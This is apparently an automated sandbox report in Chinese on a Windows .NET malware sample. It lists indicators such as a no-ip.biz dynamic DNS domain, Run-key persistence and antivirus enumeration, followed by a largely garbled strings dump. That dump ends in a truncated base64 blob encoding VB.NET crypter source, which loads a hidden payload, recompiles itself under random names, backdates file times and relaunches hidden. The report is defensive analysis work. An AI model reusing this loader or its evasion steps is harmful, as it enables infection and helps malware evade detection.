3.7
中危
DACN
0.14
FACILE
1.00
IMCLNet
0.93
MFGraph
0.00
反病毒引擎
未检测
暂无反病毒引擎检测结果
静态指标
查询计算机名称
(50 out of 91 个事件)
检查进程是否被调试器调试
(2 个事件)
| Time & API | Arguments | Status | Return | Repeated |
|---|---|---|---|---|
|
1727545335.359625 IsDebuggerPresent |
failed | 0 | 0 | |
|
1727545337.45225 IsDebuggerPresent |
failed | 0 | 0 |
一个或多个进程崩溃
(30 个事件)
动态指标
连接到动态 DNS 域
(1 个事件)
| domain | hackorchronix.no-ip.biz |
分配可读-可写-可执行内存(通常用于自解压)
(50 out of 60 个事件)
在文件系统上创建可执行文件
(2 个事件)
| file | C:\Users\Administrator\AppData\Local\Temp\dmdlwkyy.0.vb |
| file | C:\Users\Administrator\AppData\Local\Temp\tmpBAA5.tmp.exe |
投放一个二进制文件并执行它
(1 个事件)
| file | C:\Users\Administrator\AppData\Local\Temp\tmpBAA5.tmp.exe |
将可执行文件投放到用户的 AppData 文件夹
(2 个事件)
| file | C:\Users\Administrator\AppData\Local\Temp\tmpBAA5.tmp.exe |
| file | C:\Users\Administrator\AppData\Local\Temp\0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe |
一个进程创建了一个隐藏窗口
(1 个事件)
检查适配器地址以检测虚拟网络接口
(10 个事件)
该二进制文件可能包含加密或压缩数据,表明使用了打包工具
(2 个事件)
| section | {'name': '.text', 'virtual_address': '0x00002000', 'virtual_size': '0x00013164', 'size_of_data': '0x00013200', 'entropy': 7.485580105414365} | entropy | 7.485580105414365 | description | 发现高熵的节 | |||||||||
| entropy | 0.9807692307692307 | description | 此PE文件的整体熵值较高 | |||||||||||
检查系统上可疑权限的本地唯一标识符
(2 个事件)
终止另一个进程
(1 个事件)
网络通信
与未执行 DNS 查询的主机进行通信
(2 个事件)
| host | 114.114.114.114 | |||
| host | 8.8.8.8 | |||
在 Windows 启动时自我安装以实现自动运行
(1 个事件)
| reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System.XML | reg_value | "C:\Users\Administrator\AppData\Local\Temp\AppLaunch.exe" | ||||||
执行一个或多个 WMI 查询
(2 个事件)
| wmi | SELECT * FROM AntivirusProduct |
| wmi | SELECT * FROM FirewallProduct |
连接到不再响应请求的 IP 地址(合法服务通常会保持运行)
(1 个事件)
| dead_host | 44.221.84.105:80 |
二进制图像
288x288
224x224
192x192
160x160
128x128
96x96
64x64
32x32
运行截图
暂无运行截图
该样本运行过程中未生成截图
PE Compile Time
2020-07-09 14:00:58
PE Imphash
f34d5f2d4577ed6d9ceec516c1f5a744
Sections
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x00013164 | 0x00013200 | 7.485580105414365 |
| .rsrc | 0x00016000 | 0x000002b0 | 0x00000400 | 2.221497826446257 |
| .reloc | 0x00018000 | 0x0000000c | 0x00000200 | 0.10191042566270775 |
Resources
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x00016058 | 0x00000254 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
Imports
Library mscoree.dll:
• 0x402000 _CorExeMain
L!This program cannot be run in DOS mode.
`.rsrc
@.reloc
?Xkl(N
?Xkl(N
&-;DNXl5
?Xkl(N
?Xkl(N
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
I%&/m{
iG#)*eVe]f
{{;N'?\fd
! ?~| ?"?
7]~]_?
M:[ltz
hD??k0_
V -|{E
~&\V7ohwt
%_L/]=
.7oR"{
?Oc1]<
6~_s~7m0"f
_W9PCi
[hq@k|2
iol&-Z
oF;QFMz~!}
gxp~!1&>_
co~{{7 ~'4L
2>O~#~
S@?yEB
kH>N`6_a
mTpk}!$
M<!$m?
|9e?uw
21 /~]_uLuyrGN?op|7
$n_}~z~
_1g6C[ 7
%Qk::^
8[*G;AG
puL?+B*I
9Tt1T8ok
v-~Bo!)I
'Vo%aw'
_g~|24V)?
u8> :5
_H^uv>
|o?o?_
3i>1i?-
z9WoFlq
[g75(o H c`F#Q
jqlhq^C
oh=xa_;
0TvB~x~7IJ
Wh~Q J-
~_?k`
_`?]~3}:`(
4ok:4F6S~
01_~+ @m
7w~?_h_>o
ocoEc ~?
JI7A3~'~
2Ck"3hm$h
cOg1I?
~)u#Dxx6 D(
<Q;Hb+
KO:Dyk~
[C+ i.o j7
0YSz0w4
swk7w /-$U
>HT#z%`_k@F
?=:N`B~
ck|D}yF
>-w~-5~GTLo$
?wH~_[A{H~
)}B l$
E_e~Vd
^}/O_z
~__'?G
1]vi6 N'N
?37w}
-_4]}/]
?~?~o!?
_4o 3l
05ls^a:F&
4s5&;NT~
H${o)
5_cU<Q
z2km9N
.}CXa\
o%~__r
m";WbMf
m~#!o)
sd5Fm
oPp ?70d
[6oy@Z
bBq{2i
)A[*Vo[5
T>3~o;_&Nb[
~}O~3T8?ym
8G?&o}9X#!"_-
o6>;O/9u~1
~K?CV?
wD _ s
#nt.~)z
_9}B o'
3tk?-u
?0hE_5RK1
x~YC~$BE
+w*Nw
5~o/(?~
K>3x~n8om$'3
{o 0?o0
o_o_~}mno
~5^im}
~?2/oo?|'
/wOowk
?n-o-w4
k}?=vZ_W[K[%
m[K?Z_
G_+?o/
[!_Oo|Kv
!_|57K
-v]~'|;.
?~{|k-`&
>ooC~!7o
;W#_C~
;W!7oC~
bo.@P
eSvhcvh
@wodvhoo C
C./o\_
o7e*n!
oop|y
_8~>5~m3_5~?
FoKc /+
Z5_k _~_w~W
$|N/kp
5yGk?[%}
^_ho7n
D_m+<W? vM~
~MTK~_vS%okPw
%'ndU
5]vo t;`
:s^8%$
j#b0Uo
OF}A_@3^
ek6-p~_#
' &oh7-
;n8mn_n>C
A~wl$F!mHf[
[&oD~#
>oco,uZ
O~o 6/
Iqoo9l
_C^mX6
ozC' c)
~~ KFwI
Wo_T3a
z?V xu
5/~_~w3{ ~_g.?td_O
SBz7~M7&M
7OL_9u?~u~o6;~]
~="Gvm~?~
w70JCFj
'oH oF
_TAvoBo
g&*~O~[l>}
^>77y\vo
~=_>/}
^(__ApWfJ~
(8% on
oz__~7-
F7O ?._.mywQ
~cwHwc &o~~
*~0CzF7NgI}".iV`Grk
6y&k~# 5m
_f`yd`~
/&s6oo6^
ofWFfi~ko~f
o~odg7
mbfMu~
D?_"__
E'[h?5yc
~?[?G?
[ %Z[N4
!o~k)e~73?
~}$.rJ
%~hw_~uJ!
-<j<~O7~
Z #oa oB
:iC(gw4
>Xs?@R~kcfw$^K 3hB]
_o$lm`.Zs
m_#O54
+'XgZ"^1
'_C<9%k
!tFo[:
_)Ji^','q
kU5>yA,Vf<
k<#,b,
u+W^^mpo
>mko->
v%]~'^x
mh1m<22
4k~_?u
[Sook_zHc
E/o!}[Z
oG/x5uo
7[w D/E
oke_wX0l
[ZmF39=
aV m]o
FV/(]~
(PbO~_o
j^DPK2_Xu~_L~_
~MkwP~=
qB#7q0 O~o
';(o~1u'/B~
6 K9yd{
`wb~_s0}
|L$7_{>F6_
7L-{6xookI9
o4`2jh}wk)^O
oDD7M~
,_5~/;~k
_okAOJ<;;Z
~?7uy~_
Mh(15~-
L~-Lo
[oo}l<&
7V?Io_
e~)g~=
"O+KoU
S!gc&s.
)@>h~?-m
[7moH?Gz!3]*%
;S k}rJx .Y]Ky
y_??x;k<$O'_*
>q7s~~@IG
+,7`J*G7/zD8~
3koOoS@s{
2>v .#O
~ c2mwp_k@;"|w
Vh~Y3/
}xde5vkg|BZD3no[o
%~go0L'Lw1}
k.1>m2
?wU2Z]
]~'n$w!
|7]>"-
-FfM7rwJo
o~k<}B
l?F?YI_%_
M~RDOGk
w-to~]
~9L~mY#
_WH'o3N,LJOL^
yuHT+p
%o%ro;z
5zmUu$4HozUC~
;v~Kj[]h
/5oFL~%
{j|Hl]
~ ouO'
|rK?v/5_
_yG$I~k
_k`N|}'_
_u~"O c~
lb0o:D|_-
&h!k%oLo+
"_G"_F~
'JzviG`
D)\c`R
:o GJ0
O&7_sW|
5y 6 #_X
__3)k8GAq4
ZD)QI{OQ'~_f`g
M~C7ek
X1_zQ~/^
`",:zm``
#2Bc|gw?}O
p<zl[,5
r@)<u_B7u~~g'B>
kJ:+Y2-QzL
3k7u!y
-~]~:.
O7~_[W~O[%-5Eg I
tOd;G`=
a1Xoc`X5Zc)]
.n"gXCF~)~W
%?Ix]^#x/4$P/
"_M>M?-4v
0~)~e9T|
?\j_D`[
=~w=e~_5~BX
kN-L_eO7
K7YD~^
^[e[@_H
Z5~?@]\
#36A/=y'
u~}Ojc
05_ __
_cN~?~_
/]~_W.&[xa
_ K~w}A+:
3ok z_m
W?~W>B
g~G##?M~-~ _
x/o_ $~>
~ol5?vk
Iok?%I~
';C.>e|k
m~?okY/5
M85Pc_+?^g
kBh'%o
_s?c_/
}|1{?;
c?c3/
cC~3P/
??#?o1=
=~{|~=_75
_o-?#w
57|;[d~
%z_OAk$
aeJ~-w
~_w2&Kk}
e6Y_7]
m~?m#_
_&-Bk_
dJ?v ..zP
7okMqv
/5*&wO~k_IkJ
?_~_ H~_w5?
YPoo?'
k5~Lm~<5
<507U/~5
QoKo7_
wG7/~:5Voku
?~_ork=5
qO_OIM~_
?ky2m~o_
.~zkZ_?
{oskcoY? _
}~7;5kk
M_f__7C
oZ_kec
3~?oOZ
okm~VW
6?k___
o~k~_k
/_S.~o~
J:_5~Bz
{P_kk[
{og:uoW:.{
w{uv_S_
?07/h7o
/?65~kw>9_z?zMMo7
]__k?c]=8c
r_A mr
_/_E#W8musw
dokgyH-_!RJ
@+/5_?
~_WW[cRGc'$<
_'6G;?
F~rj GO@?
1__oWZcw
'~B?Yn/.
~_k9/Z_1~H-5_Kf
?kgHOZ
x_g>G~_
O+ ok ;@l~}~8}~
~oOA[K~?u
IGs -_
vk/dk s?
~rH|}o%
{vcF/~_/
M~ u7|kW#/
o~a9/3
?r3AF~{T
_ H/~?/_F
1{t_u~oI
?.`%wAog
7~H:Wo_~M_I~
v_wok_
oc>o~_w
~?wwugu
ogZ k{
K7{1|~
fl"?O_/' =_k?~__
_fw~
?<_~H~? ????$
kZfkyok
16_kDcF
co@ 5~_7
"/! 9_?OS>
a{[_M2O_?_~
75_7.O~
0Ou_u_
??co/cn
o&o;}7G
ozQ_F{ooN'c
Yof?A_#v/fofo)J5~_;k;[
_?H75#
i_>O_ G
>o<M^&'kW
?Z_7-~-J%
_kgk!sk_k
5 kk<5_
g-~_k_/5A
o}K~~k
C% '?N
[O(!=o
fZe15(uT'fO
_\ Ve1
Z_jZyM
yV/evAi0
.7<kT~
_U^gj?oOu
h~Y=+2j=
mNyq$:b
"{k<}z9
}ky}zr_/
7vlSybIs
YUM5P$0
I5/_qs
z3Oj\b(2{c
[Vw :_451K~k45o
zk|WO</z v
:)Tb<+I.
Qq _cb
syg|..~`yt9?ksQ,rf3B
3$&Df~?9~|1
?NO_+z
S^O^w8}z&''
/_w# :~c_
?i~}}S
6IG^d/O=g01Q^
Z'WY*Kc
@Ok<-x-
4+:[6bEm4w:XE5V
NC[1YU
vh~ov>
rsx^]V+4
kaI%a@i^
55t8'qhtR&^
:?7V\h
5b~5Lf?Y_
.X8s_ \z]
UqvQ=!
|_W;O=?WO
%;}kLm7o
zk} \ZEu_k
dtZAs{'x
oZA-C_%XeE
Hf@i_aAv
/{D~8~kB*t\
0"hEnX
^FG6.
+E m]]K_c]
l%Q ,25 _B=
/)_J>c
TR&1!Bc{Z
1S+%t:
:vDn )
%LV9Z$
Ou~E?jy-?~
kbO{:G
4/(/|?h>
Mh&EgO^
Xv>+pf
e^fu ~6)I
P|s^,5
G/^g&x6s
S}5V$d%9dV5V
d0y+`B&;;K]hm%we+
&w|;EUV~*l
}z=]}44u~
'F*\,X
75shP@
@I&k>D
v"^- `d7
b?0<X-
QM~Z~aF~
M/^ 'D9
7g/}7g_5~WO
/O_{yzR\
m'|y9T'
$~mZyk
dEtw)R
)5{WO.NY._
ZIE*sZu+=dd
Pn@}[J
nRLPevu
%-WG,2|4
}D$Q_eWF
^~cx~~
IF)OLHz~9}qL/|I"
}kha],
aUk-fJ2
0%:F up\&
ycd!#:$OJX
N5l]~>m*
15"x;c
9cYYO_}S*q</*_
cPf&/[
/ 2C/wq "
$B~C/7
}C%)BJ>En
5~dhX&t^W;\3vAcdiH
LzZQ07
pG%kp78
GXW9dO
}t ^4 =FN~F>c
QV8_a
95$;#[/!^;
PYHfuC/g/H89eJ [9I}$a'\j
2[ffIP?
*0f%^!L"NF.D
Z~"F^M
kaon&N
/;\B.dH
W0BF/ne
\I+~LD
%yNVG}KJFK
y&z,jD
!*R *
|_LzSg
~oBqyA/~
X!aEa:Qd}]h
sYaU=BbkF
9^E'O'
fG<~}rv
K-1I/D
w[)Z!-=11/
(OiVm?'4-
&M@_~E~k|E
ej"z_
3Hvs014
%q>[J5 )
?Q{]bo$5O)/
J|Yfo*;
&_/k\54\fF
.ivd<^M_I< o
Y#:1$ZjqVI<bLfAI2
F</_?[}/
9bku1O
(+O"qN_8}N/>t6V
$TK Co
^_=%E0s}I
/$py2{
qkd35fk
1~+6#X{
_~qN]N+
p|I}I#zk<~NcxC?_qB
1_7}J?_
Q {m>
?95~5~o7?IOi-x7~Cm)0
}]0:57~
f> ;W4L#o
KO~g4Oi
)}i;f5~|
(A_7~A"
-_og_If
s[x~R?%}C
WB_%A5~cs?79|
{3)IpR9A;#h
|V9;&n>^2%!Qo
>g[:ZwI~
ux<CvN@_
.~_wuJ
wIO'[o
9t6?~4X_h96!F
_?ck>O
X=g?o ?~R/
i~_#5GO~
~5~m2VvF?')t
5FO[Od'
k5$W'k!
w4"_7=!o4m
V u1KqL
eAP0!Nt
~[hYHIS
k|zo_g0
="Oonn'ou|3
olKIV>Me
_])3M%q;w5~r9Psb`k
toN"9s?x
a|Na^9~/
tX3^%#s7{
."k| z
H7.mKV8
svJQ(Oh
P]qcj2
CGc;gQ+q
P<>}}jTD
e>!?x1`d
2--nrp
k<|JekJIB^3O]>ZG7o
Y6<fKw9O~{
KbxU}XG|O
EFZA4 [[d&
R>&52io
Fse~8<;]
>~}p7oh3~7[>qC
L+}MC>1W@
P{x{fL?
vz`F*~
~RT%80
DN&]-^X_wD
a^>yZg
Pv6K@p
G>lG4@!+3O
qIYY<)t*
?rtxKp
<$KeB
E}kVx{0
_-d&6GR ]
o[(>&p.
w'XOS<%(& #ikx4er>%%
YCx!'q]
c()I\A
k23AJ0K_
}MkD?~
?qg?c 5~
~375~w-~
kZoB?~7I
|C51c)u'
7*7hQ%
ko@ D'f
tCokzo
E~3z'~C
|x@~_`
/o[Ao[
%-~_/eF
A'D7[:}c(XjFkz?
~?_u~}c+oH
;(.ZUjRC
~5~/'bns2
_7?WfmQ-g'
2}F9u Ik
Ve3~]eo,ek>-N
;&!T"3!ToB
W_wM`#
BWM~'2d_
?/u~}s
;IoG?HKv
Tva~M66O
00o!&HL
%v~&_<
_A,5~_
I Z oB
)/7:#k
}kZD_4
U9aF_Q@O4_N
y.O? _
~-~7$B'A;%
up@~6`
~C6">o
@8tml>iV
#MOb?uX
c7~'!A
E8WECx
foD+u&
yV<_?5`b
d)(C{W?
?$%8+
jynxUk
OSgI{~>}
;?zoFv
r?e$,5c5R
Or,a#-,T#
fNy&`1}H
&5ctk o+<f_._qhc9w;
nSW1wb3J0cyBTeXN0ZW0uSU8NCkltcG9ydHMgU3lzdGVtLklPLkNvbXByZXNzaW9uDQpJbXBvcnRzIFN5c3RlbQ0KSW1wb3J0cyBTeXN0ZW0uVGV4dA0KSW1wb3J0cyBTeXN0ZW0uRGlhZ25vc3RpY3MNCkltcG9ydHMgU3lzdGVtLkNvZGVEb20uQ29tcGlsZXINCkltcG9ydHMgU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcw0KSW1wb3J0cyBNaWNyb3NvZnQuVmlzdWFsQmFzaWMNCg0KUHVibGljIE1vZHVsZSBiQUZ3dm5PTEZqDQoNCidBUEkxDQoNCiAgICBQdWJsaWMgU3ViIE1haW4oQnlWYWwgYXJncygpIEFzIFN0cmluZykNCg0KICAgICAgICBJZiBOb3QgYXJncy5MZW5ndGggPiAwIFRoZW4NCiAgICAgICAgICAgIEF2TnhJQ1JYVUEuTGZEWVdEcmtHVygpDQogICAgICAgIEVsc2UNCiAgICAgICAgICAgIFRyeSA6IEZpbGUuRGVsZXRlKGFyZ3MoMCkpIDogQ2F0Y2ggOiBFbmQgVHJ5DQogICAgICAgIEVuZCBJZg0KDQogICAgICAgIERpbSByZXNtIEFzIE5ldyBTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlTWFuYWdlcigiekNvbSIsIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkdldEV4ZWN1dGluZ0Fzc2VtYmx5KQ0KICAgICAgICBEaW0gRGF0YVggQXMgQnl0ZSgpID0gRGVmbGF0ZV9EKHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkxvYWQoRGF0YVgpLkVudHJ5UG9pbnQuSW52b2tlKE5vdGhpbmcsIE5vdGhpbmcpDQoNCiAgICBFbmQgU3ViDQoNCiAgICBQdWJsaWMgRnVuY3Rpb24gRGVmbGF0ZV9EKEJ5VmFsIERhdGFaKCkgQXMgQnl0ZSkgQXMgQnl0ZSgpDQogICAgICAgIFRyeSA6IFJldHVybiBnZXRTdHJlYW1CeXRlc1goTmV3IERlZmxhdGVTdHJlYW0oTmV3IE1lbW9yeVN0cmVhbShEYXRhWiksIENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzLCBUcnVlKSwgRGF0YVouTGVuZ3RoKQ0KICAgICAgICBDYXRjaCA6IFJldHVybiBOb3RoaW5nIDogRW5kIFRyeQ0KICAgIEVuZCBGdW5jdGlvbg0KDQogICAgUHVibGljIEZ1bmN0aW9uIGdldFN0cmVhbUJ5dGVzWChCeVZhbCBkYXRhU3RyIEFzIFN0cmVhbSwgQnlWYWwgZGF0YUNodW5rcyBBcyBJbnRlZ2VyKSBBcyBCeXRlKCkNCiAgICAgICAgRGltIGRhdGEoKSBBcyBCeXRlIDogRGltIHRvdGFsQnl0ZXNSZWFkIEFzIEludDMyID0gMA0KICAgICAgICBUcnkgOiBXaGlsZSBUcnVlDQogICAgICAgICAgICAgICAgUmVEaW0gUHJlc2VydmUgZGF0YSh0b3RhbEJ5dGVzUmVhZCArIGRhdGFDaHVua3MpDQogICAgICAgICAgICAgICAgRGltIGJ5dGVzUmVhZCBBcyBJbnQzMiA9IGRhdGFTdHIuUmVhZChkYXRhLCB0b3RhbEJ5dGVzUmVhZCwgZGF0YUNodW5rcykNCiAgICAgICAgICAgICAgICBJZiBieXRlc1JlYWQgPSAwIFRoZW4gRXhpdCBXaGlsZQ0KICAgICAgICAgICAgICAgIHRvdGFsQnl0ZXNSZWFkICs9IGJ5dGVzUmVhZA0KICAgICAgICAgICAgRW5kIFdoaWxlDQogICAgICAgICAgICBSZURpbSBQcmVzZXJ2ZSBkYXRhKHRvdGFsQnl0ZXNSZWFkIC0gMSkNCiAgICAgICAgICAgIFJldHVybiBkYXRhDQogICAgICAgIENhdGNoIDogUmV0dXJuIE5vdGhpbmcgOiBFbmQgVHJ5DQogICAgRW5kIEZ1bmN0aW9uDQoNCidBUEkyDQoNCkVuZCBNb2R1bGUNCg0KDQpQdWJsaWMgTW9kdWxlIEF2TnhJQ1JYVUENCg0KICAgIFB1YmxpYyBTdWIgTGZEWVdEcmtHVygpDQogICAgICAgIERlbE1lKCkNCiAgICAgICAgRGltIE15UGF0aCBBcyBTdHJpbmcgPSBQcm9jZXNzLkdldEN1cnJlbnRQcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUNCg0KICAgICAgICBEaW0gcmVzbSBBcyBOZXcgU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZU1hbmFnZXIoInpDb20iLCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseS5HZXRFeGVjdXRpbmdBc3NlbWJseSkNCiAgICAgICAgRGltIHNyYyBBcyBTdHJpbmcgPSBGcm9tQmFzZShyZXNtLkdldE9iamVjdCgic3JjIikpDQogICAgICAgIERpbSB6Q29tIEFzIEJ5dGUoKSA9IERlZmxhdGVfRChyZXNtLkdldE9iamVjdCgiZmlsZSIpKQ0KICAgICAgICBVc2luZyB3cml0ZXIgQXMgTmV3IFJlc291cmNlcy5SZXNvdXJjZVdyaXRlcigiekNvbS5yZXNvdXJjZXMiKQ0KICAgICAgICAgICAgd3JpdGVyLkFkZFJlc291cmNlKCJzcmMiLCBUb0Jhc2Uoc3JjKSkNCiAgICAgICAgICAgIHdyaXRlci5BZGRSZXNvdXJjZSgiZmlsZSIsIHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgICAgICB3cml0ZXIuR2VuZXJhdGUoKQ0KICAgICAgICAgICAgd3JpdGVyLkNsb3NlKCkNCiAgICAgICAgRW5kIFVzaW5nDQoNCiAgICAgICAgRGltIHRlbXBuYW1lIEFzIFN0cmluZyA9IFN5c3RlbS5JTy5QYXRoLkdldFRlbXBGaWxlTmFtZSAmICIuZXhlIg0KDQogICAgICAgICAgICAgICAgRGltIFZhcnMgQXMgU3RyaW5nKCkgPSB7IkF2TnhJQ1JYVUEiLCAiYU5DSGl0RUJjRSIsICJiQUZ3dm5PTEZqIiwgIlVObERVY3dhYXAiLCAiZ01MTVRLSnVwZCIsICJ0UkxTeHJ5bWVpIiwgInhZcWZ3RmdTQXMiLCAiWmFWcVdxc3liYyIsICJMZkRZV0Rya0dXIn0NCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gVmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZShWYXJzKGkpLCBBKDE1KSkNCiAgICAgICAgTmV4dA0KCQlEaW0gUiBhcyBOZXcgUmFuZG9tDQoJCURpbSBYIEFzIEludGVnZXIgPSBSLk5leHQoMSwgIzEwMCMpDQoJCURpbSBqIEFzIE5ldyBVTmxEVWN3YWFwKDEsIFgpIDogUmFuZG9taXplKCkNCiAgICAgICAgU3JjID0gU3JjLlJlcGxhY2UoU3RyUmV2ZXJzZSgiMUlQQSciKSwgai5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajEgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIySVBBJyIpLCBqMS5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajIgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIzSVBBJyIpLCBqMi5nTUxNVEtKdXBkKSA6IFJhbmRvbWl6ZSgpDQoJCQ0KCQlTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIjMDAxIyIpLCBYKQ0KDQogICAgICAgIGFOQ0hpdEVCY0UuWmFWcVdxc3liYyh0ZW1wbmFtZSwgc3JjLCBUcnVlKQ0KDQogICAgICAgIERlbE1lKCkNCg0KICAgICAgICBEaW0gRGF0dW0gQXMgTmV3IERhdGUoMjAwMCArIHIuTmV4dCg3LCAxMSksIHIuTmV4dCgxLCAxMCksIHIuTmV4dCgxLCAzMCkpDQogICAgICAgIEZpbGUuU2V0Q3JlYXRpb25UaW1lKHRlbXBuYW1lLCBEYXR1bSkNCiAgICAgICAgRmlsZS5TZXRMYXN0QWNjZXNzVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQogICAgICAgIEZpbGUuU2V0TGFzdFdyaXRlVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQoNCiAgICAgICAgRGltIHN0YXJ0SW5mbyBBcyBOZXcgUHJvY2Vzc1N0YXJ0SW5mbw0KICAgICAgICBzdGFydEluZm8uV2luZG93U3R5bGUgPSBQcm9jZXNzV2luZG93U3R5bGUuSGlkZGVuDQogICAgICAgIHN0YXJ0SW5mby5GaWxlTmFtZSA9IHRlbXBuYW1lDQogICAgICAgIHN0YXJ0SW5mby5Bcmd1bWVudHMgPSBNeVBhdGgNCiAgICAgICAgUHJvY2Vzcy5TdGFydChzdGFydEluZm8pDQogICAgICAgIFByb2Nlc3MuR2V0Q3VycmVudFByb2Nlc3MuS2lsbCgpDQoNCg0KICAgIEVuZCBTdWINCg0KCSdBUEkzDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBBKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gInF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk0iLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQogICAgUHVibGljIEZ1bmN0aW9uIEFCKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gIjEyMzQ1Njc4OTAiLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQoNCiAgICBGdW5jdGlvbiBUb0Jhc2UoQnlWYWwgU3RyIEFzIFN0cmluZykgQXMgU3RyaW5nDQogICAgICAgIFJldHVybiBDb252ZXJ0LlRvQmFzZTY0U3RyaW5nKEVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoU3RyKSkNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBGdW5jdGlvbiBGcm9tQmFzZShCeVZhbCBTdHIgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgUmV0dXJuIEVuY29kaW5nLkRlZmF1bHQuR2V0U3RyaW5nKENvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhTdHIpKQ0KICAgIEVuZCBGdW5jdGlvbg0KDQoNCiAgICBTdWIgRGVsTWUoKQ0KICAgICAgICBUcnkgOiBJTy5GaWxlLkRlbGV0ZSgiekNvbS5yZXNvdXJjZXMiKSA6IENhdGNoIDogRW5kIFRyeQ0KICAgIEVuZCBTdWINCg0KRW5kIE1vZHVsZQ0KDQpQdWJsaWMgQ2xhc3MgYU5DSGl0RUJjRQ0KDQogICAgUHVibGljIFNoYXJlZCBTdWIgWmFWcVdxc3liYyhCeVZhbCBPdXRwdXQgQXMgU3RyaW5nLCBCeVZhbCBTb3VyY2UgQXMgU3RyaW5nLCBCeVZhbCByZXMgQXMgQm9vbGVhbikNCiAgICAgICAgT24gRXJyb3IgUmVzdW1lIE5leHQNCg0KICAgICAgICBEaW0gQ29tcGlsZXIgQXMgSUNvZGVDb21waWxlciA9IChOZXcgVkJDb2RlUHJvdmlkZXIpLkNyZWF0ZUNvbXBpbGVyKCkNCiAgICAgICAgRGltIFBhcmFtZXRlcnMgQXMgTmV3IENvbXBpbGVyUGFyYW1ldGVycygpDQogICAgICAgIERpbSBjUmVzdWx0cyBBcyBDb21waWxlclJlc3VsdHMNCg0KICAgICAgICBQYXJhbWV0ZXJzLkdlbmVyYXRlRXhlY3V0YWJsZSA9IFRydWUNCiAgICAgICAgUGFyYW1ldGVycy5PdXRwdXRBc3NlbWJseSA9IE91dHB1dA0KDQoNCiAgICAgICAgUGFyYW1ldGVycy5SZWZlcmVuY2VkQXNzZW1ibGllcy5BZGQoIlN5c3RlbS5kbGwiKQ0KICAgICAgICBQYXJhbWV0ZXJzLlJlZmVyZW5jZWRBc3NlbWJsaWVzLkFkZCgiU3lzdGVtLkRhdGEuZGxsIikNCg0KICAgICAgICBJZiByZXMgPSBUcnVlIFRoZW4NCiAgICAgICAgICAgIFBhcmFtZXRlcnMuRW1iZWRkZWRSZXNvdXJjZXMuQWRkKCJ6Q29tLnJlc291cmNlcyIpDQogICAgICAgIEVuZCBJZg0KICAgICAgICBQYXJhbWV0ZXJzLkNvbXBpbGVyT3B0aW9ucyA9ICIvZmlsZWFsaWduOjB4MDAwMDAyMDAgL29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1Zy0gL3RhcmdldDp3aW5leGUiDQoNCiAgICAgICAgY1Jlc3VsdHMgPSBDb21waWxlci5Db21waWxlQXNzZW1ibHlGcm9tU291cmNlKF